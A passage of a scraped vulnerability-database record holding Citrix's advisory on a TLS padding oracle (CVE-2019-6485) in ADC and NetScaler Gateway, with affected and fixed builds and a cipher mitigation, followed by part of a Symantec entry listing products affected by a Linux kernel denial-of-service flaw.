Gateway</p>\n<p>Platforms not on the list below and running the following versions of Citrix ADC and NetScaler Gateway are impacted, including Citrix ADC instances on affected SDX platforms using hardware acceleration via an assigned virtual function (VF):</p>\n<p>\u2022 Citrix ADC and NetScaler Gateway version 12.1 earlier than build 50.31</p>\n<p>\u2022 Citrix ADC and NetScaler Gateway version 12.0 earlier than build 60.9</p>\n<p>\u2022 Citrix ADC and NetScaler Gateway version 11.1 earlier than build 60.14</p>\n<p>\u2022 Citrix ADC and NetScaler Gateway version 11.0 earlier than build 72.17</p>\n<p>\u2022 Citrix ADC and NetScaler Gateway version 10.5 earlier than build 69.5</p>\n<p>The following platforms are not affected and do not require the firmware update:</p>\n<p>\u2022 MPX 5900 series</p>\n<p>\u2022 MPX/SDX 8900 series</p>\n<p>\u2022 MPX/SDX 15000-50G</p>\n<p>\u2022 MPX/SDX 26000-50S series</p>\n<p>\u2022 MPX/SDX 26000-100G series</p>\n<p>\u2022 MPX/SDX 26000 series</p>\n<p>\u2022 VPX</p>\n<p>How to check your platform: <a href=\"https://docs.citrix.com/en-us/netscaler/12/ssl/support-for-mpx-5900-8900-platforms.html\">https://docs.citrix.com/en-us/netscaler/12/ssl/support-for-mpx-5900-8900-platforms.html</a></p>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"MitigatingFactors\"> Mitigating Factors</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<p>Citrix ADC and NetScaler Gateway appliances that have disabled CBC-based cipher suites are not affected by this vulnerability. Citrix also recommends prioritizing GCM-based ciphers.</p>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"WhatCustomersShouldDo\"> What Customers Should Do</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<script src=\"https://phoenix.citrix.com/etc/clientlibs/granite/jquery.min.js\" type=\"text/javascript\"></script>\n<script src=\"https://phoenix.citrix.com/etc/clientlibs/granite/utils.min.js\" type=\"text/javascript\"></script>\n<script src=\"https://phoenix.citrix.com/etc/clientlibs/granite/jquery/granite.min.js\" type=\"text/javascript\"></script>\n<script src=\"https://phoenix.citrix.com/etc/clientlibs/foundation/jquery.min.js\" type=\"text/javascript\"></script>\n<script src=\"https://phoenix.citrix.com/etc/clientlibs/foundation/shared.min.js\" type=\"text/javascript\"></script>\n<script src=\"https://phoenix.citrix.com/etc/clientlibs/granite/lodash/modern.min.js\" type=\"text/javascript\"></script>\n<script src=\"https://phoenix.citrix.com/etc/clientlibs/foundation/personalization/kernel.min.js\" type=\"text/javascript\"></script>\n<script type=\"text/javascript\">\n $CQ(function() {\n CQ_Analytics.Engine.loadTeaser({ targetID: \"_content_support_en_securitybulletin_240000_CTX240139_jcr_content_contentsection_contentsectionpar_sectionItem2_sectionitempar_text\", teasers: [{\"path\":\"/content/support/en/securitybulletin/240000/CTX240139/_jcr_content/contentsection/contentsectionpar/sectionItem2/sectionitempar/text/default\",\"url\":\"/content/support/en/securitybulletin/240000/CTX240139/_jcr_content/contentsection/contentsectionpar/sectionItem2/sectionitempar/text.default.html\",\"name\":\"default\",\"title\":\"Default\",\"campainName\":\"\",\"thumbnail\":\"/content/support/en/securitybulletin/240000/CTX240139/_jcr_content/contentsection/contentsectionpar/sectionItem2/sectionitempar/text.thumb.png\"}], strategy: \"\", trackingURL: null});\n });\n</script>\n<div id=\"_content_support_en_securitybulletin_240000_CTX240139_jcr_content_contentsection_contentsectionpar_sectionItem2_sectionitempar_text\">\n<noscript>\n<div>\n<p>This vulnerability has been addressed in the following versions of Citrix ADC and NetScaler Gateway:</p>\n<p>\u2022 Citrix ADC and NetScaler Gateway version 12.1 build 50.31 and later</p>\n<p>\u2022 Citrix ADC and NetScaler Gateway version 12.0 build 60.9 and later</p>\n<p>\u2022 Citrix ADC and NetScaler Gateway version 11.1 build 60.14 and later</p>\n<p>\u2022 Citrix ADC and NetScaler Gateway version 11.0 build 72.17 and later </p>\n<p>\u2022 Citrix ADC and NetScaler Gateway version 10.5 build 69.5 and later</p>\n<p>These new versions can be found on the Citrix website at the following locations:</p>\n<p> <a href=\"https://www.citrix.com/downloads/netscaler-adc/\">https://www.citrix.com/downloads/netscaler-adc/</a></p>\n<p> <a href=\"https://www.citrix.com/downloads/netscaler-gateway/\">https://www.citrix.com/downloads/netscaler-gateway/</a></p>\n<p>Citrix recommends that affected customers apply appropriate mitigation or upgrade all of their vulnerable Citrix ADC appliances to a version of the appliance firmware that contains a fix for this issue as soon as possible.</p>\n<p>Information on how to configure available cipher suites on Citrix ADC can be found in the Citrix ADC documentation: <a href=\"https://docs.citrix.com/en-us/netscaler/12-1/ssl/ciphers-available-on-the-citrix-adc-appliances\">https://docs.citrix.com/en-us/netscaler/12-1/ssl/ciphers-available-on-the-citrix-adc-appliances</a></p>\n</div>\n</noscript>\n</div>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"Acknowledgements\"> Acknowledgements</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<p>Citrix would like to thank the following for working with us to protect Citrix customers:</p>\n<p>\u2022 Craig Young of Tripwire VERT</p>\n<p>\u2022 Janis Fliegenschmidt of Ruhr-Universit\u00e4t Bochum</p>\n<p>\u2022 Juraj Somorovsky of Ruhr-Universit\u00e4t Bochum / Hackmanit GmbH</p>\n<p>\u2022 Nimrod Aviram of Tel Aviv University</p>\n<p>\u2022 Robert Merget of Ruhr-Universit\u00e4t Bochum </p>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"WhatCitrixIsDoing\"> What Citrix Is Doing</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix is notifying customers and channel partners about this potential security issue. This article is also available from the Citrix Knowledge Center at <u> <a href=\"http://support.citrix.com/\">http://support.citrix.com/</a></u>.</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"ObtainingSupportonThisIssue\"> Obtaining Support on This Issue</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at <u> <a href=\"https://www.citrix.com/support/open-a-support-case.html\">https://www.citrix.com/support/open-a-support-case.html</a></u>. </p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"ReportingSecurityVulnerabilities\"> Reporting Security Vulnerabilities</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<div>\n<div>\n<p>Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. For guidance on how to report security-related issues to Citrix, please see the following document: CTX081743 \u2013 <a href=\"http://support.citrix.com/article/CTX081743\">Reporting Security Issues to Citrix</a></p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n<div>\n<!--googleoff: all-->\n<h2 id=\"Changelog\"> Changelog</h2>\n<!--googleon: all-->\n<div>\n<div>\n<div>\n<table border=\"1\" cellpadding=\"1\" cellspacing=\"0\" width=\"100%\">\n<tbody>\n<tr>\n<td>Date </td>\n<td>Change</td>\n</tr>\n<tr>\n<td>23rd January 2019</td>\n<td>Initial Publishing</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n<!--googleoff: all-->\n<hr/>\n</div>\n</div></div>\n</section>", "modified": "2019-08-15T04:00:00", "published": "2019-01-23T05:00:00", "id": "CTX240139", "href": "https://support.citrix.com/article/CTX240139", "type": "citrix", "title": "CVE-2019-6485 - TLS Padding Oracle Vulnerability in Citrix Application Delivery Controller (ADC) and NetScaler Gateway", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "symantec": [{"lastseen": "2020-01-15T18:27:18", "bulletinFamily": "software", "cvelist": ["CVE-2019-11477"], "description": "### Description\n\nLinux Kernel is prone to a remote integer-overflow vulnerability. An attacker can exploit this issue to cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Bluecoat Mail Threat Defense 1.1 \n * Bluecoat Malware Analysis Appliance 4.2 \n * Bluecoat PacketShaper S-Series 11.10 \n * Bluecoat PacketShaper S-Series 11.6 \n * Bluecoat PacketShaper S-Series 11.9 \n * Bluecoat PolicyCenter S-Series 1.1 \n * Bluecoat SSL Visibility 3.10 \n * Bluecoat SSL Visibility 3.12 \n * Bluecoat SSL Visibility 4.4 \n * Bluecoat SSL Visibility 4.5 \n * Bluecoat SSL Visibility 5.0 \n * Bluecoat X-Series XOS 10.0 \n * Bluecoat X-Series XOS 11.0 \n * Checkpoint 16000 Appliance R80.30_3.10 \n * Checkpoint 26000 Appliance R80.30_3.10 \n * Checkpoint CloudGuard Gateway R80.20_3.10 \n * Checkpoint Maestro R80.20SP \n * Checkpoint Security Management R80.10 \n * Checkpoint Security Management R80.20 \n * Checkpoint Security Management R80.30 \n * Checkpoint Small and Medium Business Appliances 1200R R76SP \n * Checkpoint Small and Medium Business Appliances 1200R R77.30 \n * Checkpoint Small and Medium Business Appliances 1200R R80.10 \n * Checkpoint Small and Medium Business Appliances 1200R R80.20 \n * Checkpoint Small and Medium Business Appliances 1200R R80.20SP \n * Checkpoint Small and Medium Business Appliances 1200R R80.30 \n * Checkpoint Small and Medium Business Appliances 1400 R76SP \n * Checkpoint Small and Medium Business Appliances 1400 R77.30 \n * Checkpoint Small and Medium Business Appliances 1400 R80.10 \n * Checkpoint Small and Medium Business Appliances 1400 R80.20 \n * Checkpoint Small and Medium Business Appliances 1400 R80.20SP \n * Checkpoint Small and Medium Business Appliances 1400 R80.30 \n * Checkpoint Small and Medium Business Appliances 700 R76SP \n * Checkpoint Small and Medium Business Appliances 700 R77.30 \n * Checkpoint Small and Medium Business Appliances 700 R80.10 \n * Checkpoint Small and Medium Business Appliances 700 R80.20 \n * Checkpoint Small and Medium Business Appliances 700 R80.20SP \n * Checkpoint Small and Medium Business Appliances 700 R80.30 \n * Citrix Hypervisor 8.0 \n * Citrix NetScaler SD-WAN 10.0.1 \n * Citrix NetScaler SD-WAN 10.0.2 \n * Citrix NetScaler SD-WAN 10.0.3 \n * Citrix NetScaler SD-WAN 10.0.4 \n * Citrix NetScaler SD-WAN 10.0.5 \n * Citrix NetScaler SD-WAN 10.0.6 \n * Citrix NetScaler SD-WAN 10.0.7 \n * Citrix SD-WAN 10.1.0 \n * Citrix SD-WAN 10.1.1 \n * Citrix SD-WAN 10.1.2 \n * Citrix SD-WAN 10.2.0 \n * Citrix SD-WAN 10.2.1 \n * Citrix SD-WAN 10.2.2 \n * Citrix SD-WAN 10.2.3 \n * Citrix SD-WAN 11.0.0 \n * Citrix XenServer 7.0 \n * Citrix XenServer 7.1 LTSR CU2 \n * Citrix XenServer 7.6 \n * F5 BIG-IP AAM 11.5.2 \n * F5 BIG-IP AAM 11.5.3 \n * F5 BIG-IP AAM 11.5.3 HF1 \n * F5 BIG-IP AAM 11.5.3 HF2 \n * F5 BIG-IP AAM 11.5.4 \n * F5 BIG-IP AAM 11.5.4 HF1 \n * F5 BIG-IP AAM 11.5.4 HF2 \n * F5 BIG-IP AAM 11.5.4 HF3 \n * F5 BIG-IP AAM 11.5.4 build 0.1.256 \n * F5 BIG-IP AAM 11.5.5 \n * F5 BIG-IP AAM 11.5.5.11.5.1 HF6 \n * F5 BIG-IP AAM 11.5.6 \n * F5 BIG-IP AAM 11.5.7 \n * F5 BIG-IP AAM 11.5.8 \n * F5 BIG-IP AAM 11.5.9 \n * F5 BIG-IP AAM 11.6.0 \n * F5 BIG-IP AAM 11.6.0 HF4 \n * F5 BIG-IP AAM 11.6.0 HF5 \n * F5 BIG-IP AAM 11.6.0 HF6 \n * F5 BIG-IP AAM 11.6.0 HF7 \n * F5 BIG-IP AAM 11.6.0 HF8 \n * F5 BIG-IP AAM 11.6.0 build 6.204.442 \n * F5 BIG-IP AAM 11.6.1 \n * F5 BIG-IP AAM 11.6.1 HF1 \n * F5 BIG-IP AAM 11.6.1 HF2 \n * F5 BIG-IP AAM 11.6.2 \n * F5 BIG-IP AAM 11.6.2 HF1 \n * F5 BIG-IP AAM 11.6.3 \n * F5 BIG-IP AAM 11.6.3.2 \n * F5 BIG-IP AAM 11.6.3.3 \n * F5 BIG-IP AAM 11.6.4 \n * F5 BIG-IP AAM 12.1.0 \n * F5 BIG-IP AAM 12.1.0 HF1 \n * F5 BIG-IP AAM 12.1.0 HF2 \n * F5 BIG-IP AAM 12.1.1 \n * F5 BIG-IP AAM 12.1.1 HF2 \n * F5 BIG-IP AAM 12.1.2 \n * F5 BIG-IP AAM 12.1.2 HF1 \n * F5 BIG-IP AAM 12.1.2 HF2 \n * F5 BIG-IP AAM 12.1.3 \n * F5 BIG-IP AAM 12.1.3.2 \n * F5 BIG-IP AAM 12.1.3.4 \n * F5 BIG-IP AAM 12.1.3.6 \n * F5 BIG-IP AAM 12.1.4 \n * F5 BIG-IP AAM 13.1.0 \n * F5 BIG-IP AAM 13.1.0.4 \n * F5 BIG-IP AAM 13.1.0.5 \n * F5 BIG-IP AAM 13.1.0.6 \n * F5 BIG-IP AAM 13.1.0.8 \n * F5 BIG-IP AAM 13.1.1 \n * F5 BIG-IP AAM 14.0.0 \n * F5 BIG-IP AAM 14.0.0.3 \n * F5 BIG-IP AAM 14.1.0 \n * F5 BIG-IP AAM 15.0.0 \n * F5 BIG-IP AFM 11.5.2 \n * F5 BIG-IP AFM 11.5.3 \n * F5 BIG-IP AFM 11.5.3 HF1 \n * F5 BIG-IP AFM 11.5.3 HF2 \n * F5 BIG-IP AFM 11.5.4 \n * F5 BIG-IP AFM 11.5.4 HF1 \n * F5 BIG-IP AFM 11.5.4 HF2 \n * F5 BIG-IP AFM 11.5.4 HF3 \n * F5 BIG-IP AFM 11.5.4 build 0.1.256 \n * F5 BIG-IP AFM 11.5.5 \n * F5 BIG-IP AFM 11.5.6 \n * F5 BIG-IP AFM 11.5.7 \n * F5 BIG-IP AFM 11.5.8 \n * F5 BIG-IP AFM 11.5.9 \n * F5 BIG-IP AFM 11.6.0 \n * F5 BIG-IP AFM 11.6.0 HF4 \n * F5 BIG-IP AFM 11.6.0 HF5 \n * F5 BIG-IP AFM 11.6.0 HF6 \n * F5 BIG-IP AFM 11.6.0 HF7 \n * F5 BIG-IP AFM 11.6.0 HF8 \n * F5 BIG-IP AFM 11.6.0 build 6.204.442 \n * F5 BIG-IP AFM 11.6.1 \n * F5 BIG-IP AFM 11.6.1 HF1 \n * F5 BIG-IP AFM 11.6.1 HF2 \n * F5 BIG-IP AFM 11.6.2 \n * F5 BIG-IP AFM 11.6.2 HF1 \n * F5 BIG-IP AFM 11.6.3 \n * F5 BIG-IP AFM 11.6.3.2 \n * F5 BIG-IP AFM 11.6.3.3 \n * F5 BIG-IP AFM 11.6.4 \n * F5 BIG-IP AFM 12.1.0 \n * F5 BIG-IP AFM 12.1.0 HF1 \n * F5 BIG-IP AFM 12.1.0 HF2 \n * F5 BIG-IP AFM 12.1.1 \n * F5 BIG-IP AFM 12.1.1 HF2 \n * F5 BIG-IP AFM 12.1.2 \n * F5 BIG-IP AFM 12.1.2 HF1 \n * F5 BIG-IP AFM 12.1.2 HF2 \n * F5 BIG-IP AFM 12.1.3 \n * F5 BIG-IP AFM 12.1.3.2 \n * F5 BIG-IP AFM 12.1.3.4 \n * F5 BIG-IP AFM 12.1.3.6 \n * F5 BIG-IP AFM 12.1.3.7 \n * F5 BIG-IP AFM 12.1.4 \n * F5 BIG-IP AFM 13.1.0 \n * F5 BIG-IP AFM 13.1.0.4 \n * F5 BIG-IP AFM 13.1.0.5 \n * F5 BIG-IP AFM 13.1.0.6 \n * F5 BIG-IP AFM 13.1.0.8 \n * F5 BIG-IP AFM 13.1.1 \n * F5 BIG-IP AFM 14.0.0 \n * F5 BIG-IP AFM 14.0.0.3 \n * F5 BIG-IP AFM 14.1.0 \n * F5 BIG-IP AFM 15.0.0 \n * F5 BIG-IP APM 11.5.2 \n * F5 BIG-IP APM 11.5.2 HF1 \n * F5 BIG-IP APM 11.5.3 \n * F5 BIG-IP APM 11.5.3 HF1 \n * F5 BIG-IP APM 11.5.3 HF2 \n * F5 BIG-IP APM 11.5.4 \n * F5 BIG-IP APM 11.5.4 HF1 \n * F5 BIG-IP APM 11.5.4 HF2 \n * F5 BIG-IP APM 11.5.4 HF3 \n * F5 BIG-IP APM 11.5.4 build 0.1.256 \n * F5 BIG-IP APM 11.5.5 \n * F5 BIG-IP APM 11.5.6 \n * F5 BIG-IP APM 11.5.7 \n * F5 BIG-IP APM 11.5.8 \n * F5 BIG-IP APM 11.5.9 \n * F5 BIG-IP APM 11.6.0 \n * F5 BIG-IP APM 11.6.0 HF3 \n * F5 BIG-IP APM 11.6.0 HF4 \n * F5 BIG-IP APM 11.6.0 HF5 \n * F5 BIG-IP APM 11.6.0 HF6 \n * F5 BIG-IP APM 11.6.0 HF7 \n * F5 BIG-IP APM 11.6.0 HF8 \n * F5 BIG-IP APM 11.6.0 build 6.204.442 \n * F5 BIG-IP APM 11.6.1 \n * F5 BIG-IP APM 11.6.1 HF1 \n * F5 BIG-IP APM 11.6.1 HF2 \n * F5 BIG-IP APM 11.6.2 \n * F5 BIG-IP APM 11.6.2 HF1 \n * F5 BIG-IP APM 11.6.3 \n * F5 BIG-IP APM 11.6.3.2 \n * F5 BIG-IP APM 11.6.3.3 \n * F5 BIG-IP APM 11.6.4 \n * F5 BIG-IP APM 12.1.0 \n * F5 BIG-IP APM 12.1.0 HF1 \n * F5 BIG-IP APM 12.1.0 HF2 \n * F5 BIG-IP APM 12.1.1 \n * F5 BIG-IP APM 12.1.1 HF2 \n * F5 BIG-IP APM 12.1.2 \n * F5 BIG-IP APM 12.1.2 HF1 \n * F5 BIG-IP APM 12.1.2 HF2 \n * F5 BIG-IP APM 12.1.3 \n * F5 BIG-IP APM 12.1.3.2 \n * F5 BIG-IP APM 12.1.3.4 \n * F5 BIG-IP APM 12.1.3.6 \n * F5 BIG-IP APM 12.1.3.7 \n * F5 BIG-IP APM 12.1.4 \n * F5 BIG-IP APM 13.1.0 \n * F5 BIG-IP APM 13.1.0.4 \n * F5 BIG-IP APM 13.1.0.5 \n * F5 BIG-IP APM 13.1.0.6 \n * F5 BIG-IP APM 13.1.0.8 \n * F5 BIG-IP APM 13.1.1 \n * F5 BIG-IP APM 14.0.0 \n * F5 BIG-IP APM 14.0.0.3 \n * F5 BIG-IP APM 14.1.0 \n * F5 BIG-IP APM 15.0.0 \n * F5 BIG-IP ASM 11.5.2 \n * F5 BIG-IP ASM 11.5.3 \n * F5 BIG-IP ASM 11.5.3 HF1 \n * F5 BIG-IP ASM 11.5.3 HF2 \n * F5 BIG-IP ASM 11.5.4 \n * F5 BIG-IP ASM 11.5.4 HF1 \n * F5 BIG-IP ASM 11.5.4 HF2 \n * F5 BIG-IP ASM 11.5.4 HF3 \n * F5 BIG-IP ASM 11.5.4 build 0.1.256 \n * F5 BIG-IP ASM 11.5.5 \n * F5 BIG-IP ASM 11.5.6 \n * F5 BIG-IP ASM 11.5.7 \n * F5 BIG-IP ASM 11.5.8 \n * F5 BIG-IP ASM 11.5.9 \n * F5 BIG-IP ASM 11.6.0 \n * F5 BIG-IP ASM 11.6.0 HF4 \n * F5 BIG-IP ASM 11.6.0 HF5 \n * F5 BIG-IP ASM 11.6.0 HF6 \n * F5 BIG-IP ASM 11.6.0 HF7 \n * F5 BIG-IP ASM 11.6.0 HF8 \n * F5 BIG-IP ASM 11.6.0 build 6.204.442 \n * F5 BIG-IP ASM 11.6.1 \n * F5 BIG-IP ASM 11.6.1 HF1 \n * F5 BIG-IP ASM 11.6.1 HF2 \n * F5 BIG-IP ASM 11.6.2 \n * F5 BIG-IP ASM 11.6.2 HF1 \n * F5 BIG-IP ASM 11.6.3 \n * F5 BIG-IP ASM 11.6.3.2 \n * F5 BIG-IP ASM 11.6.3.3 \n * F5 BIG-IP ASM 11.6.4 \n * F5 BIG-IP ASM 12.1.0 \n * F5 BIG-IP ASM 12.1.0 HF1 \n * F5 BIG-IP ASM 12.1.0 HF2 \n * F5 BIG-IP ASM 12.1.1 \n * F5 BIG-IP ASM 12.1.1 HF1 \n * F5 BIG-IP ASM 12.1.1 HF2 \n * F5 BIG-IP ASM 12.1.2 \n * F5 BIG-IP ASM 12.1.2 HF1 \n * F5 BIG-IP ASM 12.1.2 HF2 \n * F5 BIG-IP ASM 12.1.3 \n * F5 BIG-IP ASM 12.1.3.2 \n * F5 BIG-IP ASM 12.1.3.4 \n * F5 BIG-IP ASM 12.1.3.6 \n * F5 BIG-IP ASM 12.1.3.7 \n * F5 BIG-IP ASM 12.1.4 \n * F5 BIG-IP ASM 13.1.0 \n * F5 BIG-IP ASM 13.1.0.2 \n * F5 BIG-IP ASM 13.1.0.4 \n * F5 BIG-IP ASM 13.1.0.5 \n * F5 BIG-IP ASM 13.1.0.6 \n * F5 BIG-IP ASM 13.1.0.8 \n * F5 BIG-IP ASM 13.1.1 \n * F5 BIG-IP ASM 14.0.0 \n * F5 BIG-IP ASM 14.0.0.2 \n * F5 BIG-IP ASM 14.0.0.3 \n * F5 BIG-IP ASM 14.1.0 \n * F5 BIG-IP ASM 15.0.0 \n * F5 BIG-IP Analytics 11.5.2 \n * F5 BIG-IP Analytics 11.5.3 \n * F5 BIG-IP Analytics 11.5.3 HF1 \n * F5 BIG-IP Analytics 11.5.3 HF2 \n * F5 BIG-IP Analytics 11.5.4 \n * F5 BIG-IP Analytics 11.5.4 HF1 \n * F5 BIG-IP Analytics 11.5.4 HF2 \n * F5 BIG-IP Analytics 11.5.4 HF3 \n * F5 BIG-IP Analytics 11.5.4 build 0.1.256 \n * F5 BIG-IP Analytics 11.5.5 \n * F5 BIG-IP Analytics 11.5.6 \n * F5 BIG-IP Analytics 11.5.7 \n * F5 BIG-IP Analytics 11.5.8 \n * F5 BIG-IP Analytics 11.5.9 \n * F5 BIG-IP Analytics 11.6.0 \n * F5 BIG-IP Analytics 11.6.0 HF4 \n * F5 BIG-IP Analytics 11.6.0 HF5 \n * F5 BIG-IP Analytics 11.6.0 HF6 \n * F5 BIG-IP Analytics 11.6.0 HF7 \n * F5 BIG-IP Analytics 11.6.0 build 6.204.442 \n * F5 BIG-IP Analytics 11.6.1 \n * F5 BIG-IP Analytics 11.6.1 HF1 \n * F5 BIG-IP Analytics 11.6.1 HF2 \n * F5 BIG-IP Analytics 11.6.2 \n * F5 BIG-IP Analytics 11.6.2 HF1 \n * F5 BIG-IP Analytics 11.6.3 \n * F5 BIG-IP Analytics 11.6.3.2 \n * F5 BIG-IP Analytics 11.6.3.3 \n * F5 BIG-IP Analytics 11.6.4 \n * F5 BIG-IP Analytics 12.1.0 \n * F5 BIG-IP Analytics 12.1.1 \n * F5 BIG-IP Analytics 12.1.1 HF2 \n * F5 BIG-IP Analytics 12.1.2 \n * F5 BIG-IP Analytics 12.1.2 HF1 \n * F5 BIG-IP Analytics 12.1.2 HF2 \n * F5 BIG-IP Analytics 12.1.3 \n * F5 BIG-IP Analytics 12.1.3.2 \n * F5 BIG-IP Analytics 12.1.3.4 \n * F5 BIG-IP Analytics 12.1.3.6 \n * F5 BIG-IP Analytics 12.1.3.7 \n * F5 BIG-IP Analytics 12.1.4 \n * F5 BIG-IP Analytics 13.1.0 \n * F5 BIG-IP Analytics 13.1.0.4 \n * F5 BIG-IP Analytics 13.1.0.5 \n * F5 BIG-IP Analytics 13.1.0.6 \n * F5 BIG-IP Analytics 13.1.0.8 \n * F5 BIG-IP Analytics 13.1.1 \n * F5 BIG-IP Analytics 14.0.0 \n * F5 BIG-IP Analytics 14.0.0.3 \n * F5 BIG-IP Analytics 14.1.0 \n * F5 BIG-IP Analytics 15.0.0 \n * F5 BIG-IP DNS 11.5.2 \n * F5 BIG-IP DNS 11.5.3 \n * F5 BIG-IP DNS 11.5.4 \n * F5 BIG-IP DNS 11.5.4 HF1 \n * F5 BIG-IP DNS 11.5.5 \n * F5 BIG-IP DNS 11.5.6 \n * F5 BIG-IP DNS 11.5.7 \n * F5 BIG-IP DNS 11.5.8 \n * F5 BIG-IP DNS 11.5.9 \n * F5 BIG-IP DNS 11.6.0 \n * F5 BIG-IP DNS 11.6.1 \n * F5 BIG-IP DNS 11.6.2 \n * F5 BIG-IP DNS 11.6.3 \n * F5 BIG-IP DNS 11.6.3.2 \n * F5 BIG-IP DNS 11.6.3.3 \n * F5 BIG-IP DNS 11.6.4 \n * F5 BIG-IP DNS 12.1.0 \n * F5 BIG-IP DNS 12.1.1 \n * F5 BIG-IP DNS 12.1.1 HF2 \n * F5 BIG-IP DNS 12.1.2 \n * F5 BIG-IP DNS 12.1.2 HF1 \n * F5 BIG-IP DNS 12.1.2 HF2 \n * F5 BIG-IP DNS 12.1.3 \n * F5 BIG-IP DNS 12.1.3.2 \n * F5 BIG-IP DNS 12.1.3.4 \n * F5 BIG-IP DNS 12.1.3.5 \n * F5 BIG-IP DNS 12.1.3.6 \n * F5 BIG-IP DNS 12.1.3.7 \n * F5 BIG-IP DNS 12.1.4 \n * F5 BIG-IP DNS 13.1.0 \n * F5 BIG-IP DNS 13.1.0.4 \n * F5 BIG-IP DNS 13.1.0.5 \n * F5 BIG-IP DNS 13.1.0.6 \n * F5 BIG-IP DNS 13.1.0.7 \n * F5 BIG-IP DNS 13.1.0.8 \n * F5 BIG-IP DNS 13.1.1 \n * F5 BIG-IP DNS 14.0.0 \n * F5 BIG-IP DNS 14.0.0.3 \n * F5 BIG-IP DNS 14.1.0 \n * F5 BIG-IP DNS 15.0.0 \n * F5 BIG-IP Edge Gateway 11.5.2 \n * F5 BIG-IP Edge Gateway 11.5.6 \n * F5 BIG-IP Edge Gateway 11.5.7 \n * F5 BIG-IP Edge Gateway 11.5.8 \n * F5 BIG-IP Edge Gateway 11.5.9 \n * F5 BIG-IP Edge Gateway 11.6.1 \n * F5 BIG-IP Edge Gateway 11.6.2 \n * F5 BIG-IP Edge Gateway 11.6.3 \n * F5 BIG-IP Edge Gateway 11.6.3.3 \n * F5 BIG-IP Edge Gateway 11.6.4 \n * F5 BIG-IP Edge Gateway 12.1.0 \n * F5 BIG-IP Edge Gateway 12.1.14 \n * F5 BIG-IP Edge Gateway 12.1.2 \n * F5 BIG-IP Edge Gateway 12.1.3 \n * F5 BIG-IP Edge Gateway 12.1.4 \n * F5 BIG-IP Edge Gateway 13.1.0 \n * F5 BIG-IP Edge Gateway 13.1.0.5 \n * F5 BIG-IP Edge Gateway 13.1.0.6 \n * F5 BIG-IP Edge Gateway 13.1.1 \n * F5 BIG-IP Edge Gateway 14.0.0 \n * F5 BIG-IP Edge Gateway 14.0.0.3 \n * F5 BIG-IP Edge Gateway 14.1.0 \n * F5 BIG-IP FPS 11.5.2 \n * F5 BIG-IP FPS 11.5.6 \n * F5 BIG-IP FPS 11.5.7 \n * F5 BIG-IP FPS 11.5.8 \n * F5 BIG-IP FPS 11.5.9 \n * F5 BIG-IP FPS 11.6.0 \n * F5 BIG-IP FPS 11.6.1 \n * F5 BIG-IP FPS 11.6.2 \n * F5 BIG-IP FPS 11.6.3 \n * F5 BIG-IP FPS 11.6.3.2 \n * F5 BIG-IP FPS 11.6.3.3 \n * F5 BIG-IP FPS 11.6.4 \n * F5 BIG-IP FPS 12.1.0 \n * F5 BIG-IP FPS 12.1.1 \n * F5 BIG-IP FPS 12.1.1 HF2 \n * F5 BIG-IP FPS 12.1.2 \n * F5 BIG-IP FPS 12.1.3 \n * F5 BIG-IP FPS 12.1.3.6 \n * F5 BIG-IP FPS 12.1.3.7 \n * F5 BIG-IP FPS 12.1.4 \n * F5 BIG-IP FPS 13.1.0 \n * F5 BIG-IP FPS 13.1.0.8 \n * F5 BIG-IP FPS 13.1.1 \n * F5 BIG-IP FPS 14.0.0 \n * F5 BIG-IP FPS 14.0.0.3 \n * F5 BIG-IP FPS 14.1.0 \n * F5 BIG-IP FPS 15.0.0 \n * F5 BIG-IP GTM 11.5.2 \n * F5 BIG-IP GTM 11.5.3 \n * F5 BIG-IP GTM 11.5.3 HF1 \n * F5 BIG-IP GTM 11.5.3 HF2 \n * F5 BIG-IP GTM 11.5.4 \n * F5 BIG-IP GTM 11.5.4 HF1 \n * F5 BIG-IP GTM 11.5.4 HF2 \n * F5 BIG-IP GTM 11.5.4 HF3 \n * F5 BIG-IP GTM 11.5.4 build 0.1.256 \n * F5 BIG-IP GTM 11.5.5 \n * F5 BIG-IP GTM 11.5.6 \n * F5 BIG-IP GTM 11.5.7 \n * F5 BIG-IP GTM 11.5.8 \n * F5 BIG-IP GTM 11.5.9 \n * F5 BIG-IP GTM 11.6.0 \n * F5 BIG-IP GTM 11.6.0 HF4 \n * F5 BIG-IP GTM 11.6.0 HF5 \n * F5 BIG-IP GTM 11.6.0 HF6 \n * F5 BIG-IP GTM 11.6.0 HF7 \n * F5 BIG-IP GTM 11.6.0 build 6.204.442 \n * F5 BIG-IP GTM 11.6.1 \n * F5 BIG-IP GTM 11.6.1 HF1 \n * F5 BIG-IP GTM 11.6.1 HF2 \n * F5 BIG-IP GTM 11.6.2 \n * F5 BIG-IP GTM 11.6.2 HF1 \n * F5 BIG-IP GTM 11.6.3 \n * F5 BIG-IP GTM 11.6.3.2 \n * F5 BIG-IP GTM 11.6.3.3 \n * F5 BIG-IP GTM 11.6.4 \n * F5 BIG-IP GTM 12.1.0 \n * F5 BIG-IP GTM 